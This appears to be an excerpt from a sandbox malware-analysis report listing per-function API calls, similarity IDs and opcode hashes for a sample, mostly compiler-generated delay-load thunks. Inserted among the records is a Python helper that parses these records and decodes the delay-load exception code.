                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00473C3F
                                                                  Similarity
                                                                  • API ID: AddressProc
                                                                  • String ID:
                                                                  • API String ID: 190572456-0
                                                                  APIs
                                                                  • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0047CA2C,00000000,?,00476CBE,?,00000008,?,004791E0,?,?,?), ref: 00478E38
                                                                  Similarity
                                                                  • API ID: AllocateHeap
                                                                  • String ID:
                                                                  • API String ID: 1279760036-0
                                                                  APIs
                                                                  • __EH_prolog.LIBCMT ref: 00455AC2
                                                                    • Part of subcall function 0045B505: __EH_prolog.LIBCMT ref: 0045B50A
                                                                  Similarity
                                                                  • API ID: H_prolog
                                                                  • String ID:
                                                                  • API String ID: 3519838083-0
                                                                  APIs
                                                                    • Part of subcall function 0045A69B: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0045A592,000000FF,?,?), ref: 0045A6C4
                                                                    • Part of subcall function 0045A69B: FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,0045A592,000000FF,?,?), ref: 0045A6F2
                                                                    • Part of subcall function 0045A69B: GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0045A592,000000FF,?,?), ref: 0045A6FE
                                                                  • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0045A598
                                                                  Similarity
                                                                  • API ID: Find$FileFirst$CloseErrorLast
                                                                  • String ID:
                                                                  • API String ID: 1464966427-0
                                                                  APIs
                                                                  • SetThreadExecutionState.KERNEL32(00000001), ref: 00460E3D
                                                                  Similarity
                                                                  • API ID: ExecutionStateThread
                                                                  • String ID:
                                                                  • API String ID: 2211380416-0
                                                                  APIs
                                                                  • GdipAlloc.GDIPLUS(00000010), ref: 0046A62C
                                                                    • Part of subcall function 0046A3B9: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 0046A3DA
                                                                  Similarity
                                                                  • API ID: Gdip$AllocBitmapCreateFromStream
                                                                  • String ID:
                                                                  • API String ID: 1915507550-0
                                                                  • Opcode ID: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                                                  • Instruction ID: 71871a91fe7ee7e6a29dad0e0978f07d639ccaf581358f7ed9feaae8fd31c3c6
                                                                  • Opcode Fuzzy Hash: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                                                  • Instruction Fuzzy Hash: 44D0A73020070876DF01AF22CC0296E7595EB10344F00C027BC81E5241FAB5D920995B
                                                                  APIs
                                                                  • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,00000000,00461B3E), ref: 0046DD92
                                                                    • Part of subcall function 0046B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0046B579
                                                                    • Part of subcall function 0046B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0046B58A
                                                                    • Part of subcall function 0046B568: IsDialogMessageW.USER32(00010424,?), ref: 0046B59E
                                                                    • Part of subcall function 0046B568: TranslateMessage.USER32(?), ref: 0046B5AC
                                                                    • Part of subcall function 0046B568: DispatchMessageW.USER32(?), ref: 0046B5B6
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                   • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: Message$DialogDispatchItemPeekSendTranslate
                                                                  • String ID:
                                                                  • API String ID: 897784432-0
                                                                  • Opcode ID: 0aae4d9ad9b622c1a76f790684c5a8f30d9644c42ffb42e19d112d49e47b4c4c
                                                                  • Instruction ID: 1ab268820c1cb12288dd416883c8a07deb5a00cc669bc26f2ec24bcc03d22465
                                                                  • Opcode Fuzzy Hash: 0aae4d9ad9b622c1a76f790684c5a8f30d9644c42ffb42e19d112d49e47b4c4c
                                                                  • Instruction Fuzzy Hash: 87D09E31244300BBD6012B56CD06F0B7AA6AF99B09F004569B285740B19672AD61DB1B
                                                                  APIs
                                                                  • DloadProtectSection.DELAYIMP ref: 0046E5E3
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                   • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: DloadProtectSection
                                                                  • String ID:
                                                                  • API String ID: 2203082970-0
                                                                  • Opcode ID: a8e96b172e66876d511c23ef808eb136270593af7e00a2c6dfff28116a948a6c
                                                                  • Instruction ID: 0058d34b90923a085067517af941132cae4971e00121ebe9731de55e2134473d
                                                                  • Opcode Fuzzy Hash: a8e96b172e66876d511c23ef808eb136270593af7e00a2c6dfff28116a948a6c
                                                                  • Instruction Fuzzy Hash: E2D0C7791801409BD701EBD7989575537E47324705FE00927B14592561F66C54428A1F
                                                                  APIs
                                                                  • GetFileType.KERNELBASE(000000FF,004597BE), ref: 004598C8
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                   • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: FileType
                                                                  • String ID:
                                                                  • API String ID: 3081899298-0
                                                                  • Opcode ID: c040a3644c40801f68c3389ba07ebb1cfab8391f10b2f669391fe7b54ddc667b
                                                                  • Instruction ID: 6cd980c8cecad77c5b219c27f4d854dd8988a1689f1e30b66d941d4097d4f3ed
                                                                  • Opcode Fuzzy Hash: c040a3644c40801f68c3389ba07ebb1cfab8391f10b2f669391fe7b54ddc667b
                                                                  • Instruction Fuzzy Hash: 38C01234410205D58E206A24984809B7311AA533677B48695C4288A1A2C32ACC4FEB05
                                                                  APIs
                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0046E3FC
                                                                    • Part of subcall function 0046E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0046E8D0
                                                                    • Part of subcall function 0046E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0046E8E1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                   • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                  • String ID:
                                                                  • API String ID: 1269201914-0
                                                                  • Opcode ID: 98d3422056efac69cd31c6fd1f064f718e3501f413efd212577555f23eefa8dd
                                                                  • Instruction ID: 8eddc0d25f93eef336f03f83eec9b497855b800a570ae7fbafaafaa078b40f18
                                                                  • Opcode Fuzzy Hash: 98d3422056efac69cd31c6fd1f064f718e3501f413efd212577555f23eefa8dd
                                                                  • Instruction Fuzzy Hash: D7B012E9258000BC3144B1071D42D3B028CC4C1B11330C43FFC04E3180F84C4C460A3F
                                                                  APIs
                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0046E3FC
                                                                    • Part of subcall function 0046E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0046E8D0
                                                                    • Part of subcall function 0046E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0046E8E1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                   • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                  • String ID:
                                                                  • API String ID: 1269201914-0
                                                                  • Opcode ID: ea1b94cf25e46546fc29c7bb37bec4188de8436ab3c70a3c889df25653d47167
                                                                  • Instruction ID: 410d6bf7c96c76df2c256fe54f0e974efcac577eb97339549b416adedb7e4de5
                                                                  • Opcode Fuzzy Hash: ea1b94cf25e46546fc29c7bb37bec4188de8436ab3c70a3c889df25653d47167
                                                                  • Instruction Fuzzy Hash: 04B092A92980006C214471071A42D7A0288C581B11330C42FB904E2180B8480C4A093B
                                                                  APIs
                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0046E3FC
                                                                    • Part of subcall function 0046E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0046E8D0
                                                                    • Part of subcall function 0046E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0046E8E1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                   • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                  • String ID:
                                                                  • API String ID: 1269201914-0
                                                                  • Opcode ID: 067d0137533a1d21b3641705f21f7dc5ed0948437c54cf929043eae66edc6804
                                                                  • Instruction ID: 4f9710760621ab5ce3492adf62081c282035a5789b846820f0b4eef974599762
                                                                  • Opcode Fuzzy Hash: 067d0137533a1d21b3641705f21f7dc5ed0948437c54cf929043eae66edc6804
                                                                  • Instruction Fuzzy Hash: 5BB092A9258000BC2144B10B1902D3A0298C880B11330842FB804E2181F84C4E42093B
                                                                  APIs
                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0046E580
                                                                    • Part of subcall function 0046E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0046E8D0
                                                                    • Part of subcall function 0046E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0046E8E1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                   • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                  • String ID:
                                                                  • API String ID: 1269201914-0
                                                                  • Opcode ID: 3d453c44465b91286b36f3ba25b012a4a66b930a9c9ebb84bbdaa3432d31f47d
                                                                  • Instruction ID: 422c2cfd0e358da69dc4d92f466a552609e162984f5202eb6889bbd30f05c711
                                                                  • Opcode Fuzzy Hash: 3d453c44465b91286b36f3ba25b012a4a66b930a9c9ebb84bbdaa3432d31f47d
                                                                  • Instruction Fuzzy Hash: A3B012C92580007D3144719B1C02D3B018CC0C0B15330843FF405C3080F85C0C01193F
                                                                  APIs
                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0046E580
                                                                    • Part of subcall function 0046E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0046E8D0
                                                                    • Part of subcall function 0046E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0046E8E1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                   • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                  • String ID:
                                                                  • API String ID: 1269201914-0
                                                                  • Opcode ID: c6f07bcbb2bd583fbe9740a3e19d69e3bc647bb6caa774bdd36830c71b7a667b
                                                                  • Instruction ID: 61c26ea2e6db9d69175043c3970a252f1adddd4ad69853dfdd28feade8262c1a
                                                                  • Opcode Fuzzy Hash: c6f07bcbb2bd583fbe9740a3e19d69e3bc647bb6caa774bdd36830c71b7a667b
                                                                  • Instruction Fuzzy Hash: B0B012C9298000BC3144719B5D02D3B019CC0C0B15330863FF405D3080FC4C0D02193F
                                                                  APIs
                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0046E580
                                                                    • Part of subcall function 0046E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0046E8D0
                                                                    • Part of subcall function 0046E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0046E8E1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                   • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                  • String ID:
                                                                  • API String ID: 1269201914-0
                                                                  • Opcode ID: aff9e2a5dd51752b327c0611158363de38604a140c401e861a5fea92448927fc
                                                                  • Instruction ID: e6ca49297ebbe43c78c94f944c945ede94671bac307998176a1847b9c78cea77
                                                                  • Opcode Fuzzy Hash: aff9e2a5dd51752b327c0611158363de38604a140c401e861a5fea92448927fc
                                                                  • Instruction Fuzzy Hash: EEB012C9258100BC3184719B5C03D3B019CC0C0B15330863FF405C3080F84C1C41193F
                                                                  APIs
                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0046E3FC
                                                                    • Part of subcall function 0046E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0046E8D0
                                                                    • Part of subcall function 0046E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0046E8E1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                   • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                  • String ID:
                                                                  • API String ID: 1269201914-0
                                                                  • Opcode ID: 835fda0b8988dd8efff02834fdad8f951a5f61bb0ce50d12dc4d1b2483ff4981
                                                                  • Instruction ID: ca098169ed10e9769e2ab16ab392fc6b17108f132c7a07a78ac584c7bfbf4dfd
                                                                  • Opcode Fuzzy Hash: 835fda0b8988dd8efff02834fdad8f951a5f61bb0ce50d12dc4d1b2483ff4981
                                                                  • Instruction Fuzzy Hash: 3AA001EA2A91527D314872536E46D3B029DC4C1B29330992FF825B6581BC981C86197B
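The records above are dominated by delay-load thunks: every function that calls `___delayLoadHelper2@8` shares API String ID 1269201914-0, and the `RaiseException(C06D0057, 00000000, 00000001, ?)` reached through their common sub-function 0046E85D is the VC++ CRT's own delay-load failure path (reading the constant: severity bits 11 = error, facility 0x6D = FACILITY_VISUALCPP, Win32 error 0x57 = ERROR_INVALID_PARAMETER, i.e. `VcppException(ERROR_SEVERITY_ERROR, ERROR_INVALID_PARAMETER)`), not behaviour of the sample. That interpretation of the constant is mine, not the report's. The Python below is an added triage helper, not part of the Joe Sandbox report or of top.exe: it parses records in the layout shown on this page from a constructed sample whose field values are copied from the records above, clusters them by API String ID, flags functions whose direct calls are all DELAYIMP glue so they can be skipped, and decodes the exception code. It assumes only the bullet/section layout visible here.

```python
"""Parse Joe Sandbox per-function records (APIs / Memory Dump Source /
Similarity blocks), cluster by API String ID, separate compiler-generated
delay-load thunks from sample logic, and decode RaiseException codes."""
import re
from collections import defaultdict

# Constructed sample: two records in the report's layout, field values copied
# from this page (one delay-load thunk, one genuine GetFileType caller).
SAMPLE = """\
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0046E3FC
  • Part of subcall function 0046E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0046E8D0
  • Part of subcall function 0046E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0046E8E1
Memory Dump Source
• Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: 98d3422056efac69cd31c6fd1f064f718e3501f413efd212577555f23eefa8dd
APIs
• GetFileType.KERNELBASE(000000FF,004597BE), ref: 004598C8
Similarity
• API ID: FileType
• API String ID: 3081899298-0
• Opcode ID: c040a3644c40801f68c3389ba07ebb1cfab8391f10b2f669391fe7b54ddc667b
"""

# "• [Part of subcall function ADDR: ]Name.MODULE[(args)], ref: ADDR"
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<name>[\w@]+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)\s*$")
FIELD_RE = re.compile(r"^\s*•\s*(?P<key>[^:]+?):\s*(?P<val>.*?)\s*$")


def parse_records(text):
    """One dict per function: {'apis': [...], 'fields': {...}}. An API entry
    has name, module, args, ref (call site) and sub (address of the
    sub-function making the call, None for a direct call)."""
    records, section = [], None
    for line in text.splitlines():
        s = line.strip()
        if not s:
            continue
        if not s.startswith("•"):          # section header; 'APIs' opens a record
            section = s
            if s == "APIs":
                records.append({"apis": [], "fields": {}})
        elif not records:
            continue                       # bullet before the first record
        elif section == "APIs" and (m := API_RE.match(line)):
            args = m.group("args")
            records[-1]["apis"].append({
                "name": m.group("name"), "module": m.group("module"),
                "args": args.split(",") if args else [],
                "ref": m.group("ref"), "sub": m.group("sub")})
        elif section != "APIs" and (m := FIELD_RE.match(line)):
            records[-1]["fields"][m.group("key")] = m.group("val")
    return records


def is_delay_load_thunk(rec):
    """True when every direct call is a DELAYIMP helper, i.e. compiler-generated
    delay-load glue rather than the sample's own code."""
    direct = [a for a in rec["apis"] if a["sub"] is None]
    return bool(direct) and all(a["module"] == "DELAYIMP" for a in direct)


def group_by_api_string_id(records):
    """Map API String ID -> Opcode IDs; large clusters are boilerplate to skip."""
    groups = defaultdict(list)
    for rec in records:
        f = rec["fields"]
        groups[f.get("API String ID", "")].append(f.get("Opcode ID", ""))
    return dict(groups)


def raise_exception_codes(records):
    """First argument of every RaiseException call, as integers."""
    return {int(a["args"][0], 16) for rec in records for a in rec["apis"]
            if a["name"] == "RaiseException" and a["args"]}


SEVERITY = {0: "success", 1: "informational", 2: "warning", 3: "error"}
FACILITIES = {0x6D: "FACILITY_VISUALCPP"}
WIN32_ERRORS = {0x57: "ERROR_INVALID_PARAMETER",
                0x7E: "ERROR_MOD_NOT_FOUND", 0x7F: "ERROR_PROC_NOT_FOUND"}


def decode_exception_code(code):
    """Split an NTSTATUS-style code: severity (bits 30-31), facility (16-27),
    low 16-bit error. The VC++ CRT builds its delay-load exceptions as
    VcppException(ERROR_SEVERITY_ERROR, win32_err) = 0xC06D0000 | win32_err."""
    sev, fac, err = (code >> 30) & 0x3, (code >> 16) & 0xFFF, code & 0xFFFF
    return {"severity": SEVERITY[sev], "facility": fac,
            "facility_name": FACILITIES.get(fac, "unknown"),
            "error": err, "error_name": WIN32_ERRORS.get(err, "unknown")}


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    print({k: len(v) for k, v in group_by_api_string_id(recs).items()})
    print([decode_exception_code(c) for c in raise_exception_codes(recs)])
```

Point `parse_records` at the text of a whole report section and sort the clusters by size; on this sample the 1269201914-0 cluster is entirely DELAYIMP thunks, while any RaiseException code that decodes to a facility other than 0x6D, or to an unknown error, deserves a look because it did not come from the CRT.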
                                                                  APIs
                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0046E3FC
                                                                    • Part of subcall function 0046E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0046E8D0
                                                                    • Part of subcall function 0046E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0046E8E1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                  Similarity
                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                  • String ID:
                                                                  • API String ID: 1269201914-0
                                                                  APIs
                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0046E3FC
                                                                    • Part of subcall function 0046E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0046E8D0
                                                                    • Part of subcall function 0046E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0046E8E1
                                                                  Similarity
                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                  • String ID:
                                                                  • API String ID: 1269201914-0
                                                                  APIs
                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0046E3FC
                                                                    • Part of subcall function 0046E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0046E8D0
                                                                    • Part of subcall function 0046E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0046E8E1
                                                                  Similarity
                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                  • String ID:
                                                                  • API String ID: 1269201914-0
                                                                  APIs
                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0046E3FC
                                                                    • Part of subcall function 0046E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0046E8D0
                                                                    • Part of subcall function 0046E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0046E8E1
                                                                  Similarity
                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                  • String ID:
                                                                  • API String ID: 1269201914-0
                                                                  APIs
                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0046E3FC
                                                                    • Part of subcall function 0046E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0046E8D0
                                                                    • Part of subcall function 0046E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0046E8E1
                                                                  Similarity
                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                  • String ID:
                                                                  • API String ID: 1269201914-0
                                                                  APIs
                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0046E580
                                                                    • Part of subcall function 0046E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0046E8D0
                                                                    • Part of subcall function 0046E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0046E8E1
                                                                  Similarity
                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                  • String ID:
                                                                  • API String ID: 1269201914-0
                                                                  APIs
                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0046E580
                                                                    • Part of subcall function 0046E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0046E8D0
